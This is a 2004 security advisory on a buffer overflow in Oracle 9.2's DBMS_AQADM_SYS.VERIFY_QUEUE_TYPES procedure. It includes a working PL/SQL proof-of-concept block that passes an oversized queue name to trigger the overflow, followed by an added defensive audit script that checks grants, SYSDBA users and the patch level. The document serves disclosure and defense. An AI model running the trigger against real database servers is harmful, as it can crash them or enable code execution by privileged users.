Application Security, Inc.

Team SHATTER Security Alert

#30 - Buffer overflow in procedure VERIFY_QUEUE_TYPES of DBMS_AQADM_SYS package

August 31, 2004

Credit: This vulnerability was researched and discovered by Esteban Martínez Fayó of Application Security, Inc.

Risk level: Medium

Details:
When the VERIFY_QUEUE_TYPES procedure is called with a long string in the SRC_QUEUE_NAME parameter, a buffer overflow occurs.

To reproduce the overflow, execute the following PL/SQL block:

DECLARE
  P_SRC_QUEUE_NAME VARCHAR2(32767);
  P_DEST_QUEUE_NAME VARCHAR2(32767);
  P_DESTINATION VARCHAR2(32767);
  P_TRANSFORMATION VARCHAR2(32767);
  P_QUEUE_EXISTS BOOLEAN;
  P_GET_NRP BOOLEAN;
  P_RC BINARY_INTEGER;
  AAA VARCHAR2(32767);
BEGIN
  -- Build a 16384-character string ('A' doubled fourteen times) to pass as SRC_QUEUE_NAME.
  AAA:='A';
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  P_SRC_QUEUE_NAME := AAA;
  P_DEST_QUEUE_NAME := '';
  P_DESTINATION := '';
  P_TRANSFORMATION := '';
  P_QUEUE_EXISTS := FALSE;
  P_GET_NRP := FALSE;
  SYS.DBMS_AQADM_SYS.VERIFY_QUEUE_TYPES(
    SRC_QUEUE_NAME => P_SRC_QUEUE_NAME,
    DEST_QUEUE_NAME => P_DEST_QUEUE_NAME,
    DESTINATION => P_DESTINATION,
    TRANSFORMATION => P_TRANSFORMATION,
    QUEUE_EXISTS => P_QUEUE_EXISTS,
    GET_NRP => P_GET_NRP,
    RC => P_RC);
END;
/

Analysis:
This vulnerability can be exploited by members of the SYSDBA role and by users granted EXECUTE permission on the DBMS_AQADM_SYS package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Oracle 10g is not vulnerable.
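The Analysis section above narrows the exposed population to SYSDBA holders and accounts with EXECUTE on SYS.DBMS_AQADM_SYS, and the Vendor Fix section names 9.2.0.5 as the fixed release. The following audit script is an added example, not part of the original advisory and not Application Security's or Oracle's code; it assumes a DBA-privileged connection to the instance being assessed and uses only the standard data dictionary views DBA_TAB_PRIVS, DBA_ROLE_PRIVS, PRODUCT_COMPONENT_VERSION and V$PWFILE_USERS. The grantee name in the final REVOKE is a placeholder to be replaced with whatever the first query returns.

```sql
-- Added audit script for advisory #30 (not part of the original advisory).
-- Assumes a DBA connection to the Oracle 9.2 instance under review.

-- 1. Who holds a direct EXECUTE grant on the vulnerable package, other than SYS?
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_AQADM_SYS'
   AND privilege = 'EXECUTE'
   AND grantee <> 'SYS'
 ORDER BY grantee;

-- 2. If any grantee above is a role, expand it to the users that hold that role,
--    since they reach the package indirectly.
SELECT rp.grantee AS user_or_role, rp.granted_role
  FROM dba_role_privs rp
 WHERE rp.granted_role IN (
         SELECT grantee
           FROM dba_tab_privs
          WHERE owner = 'SYS'
            AND table_name = 'DBMS_AQADM_SYS'
            AND privilege = 'EXECUTE')
 ORDER BY rp.granted_role, rp.grantee;

-- 3. SYSDBA holders can also call the package; list them from the password file.
SELECT username, sysdba
  FROM v$pwfile_users
 WHERE sysdba = 'TRUE';

-- 4. Confirm the installed release. The advisory states the fix ships in 9.2.0.5;
--    any 9.2.0.x below that is unpatched, and 10g is not affected.
SELECT product, version, status
  FROM product_component_version
 WHERE product LIKE 'Oracle%';

-- 5. Interim mitigation until Patchset 4 is applied: remove EXECUTE from any
--    grantee found in step 1 that does not need AQ administration.
--    <GRANTEE_FROM_STEP_1> is a placeholder, not a real account name.
-- REVOKE EXECUTE ON SYS.DBMS_AQADM_SYS FROM <GRANTEE_FROM_STEP_1>;
```

Run the four SELECTs first and keep their output with the change record; the REVOKE is left commented so that it is applied deliberately per grantee rather than as part of the read-only audit. Revoking EXECUTE only reduces the exposed population; SYSDBA accounts remain able to reach the package, so the patchset is the actual fix.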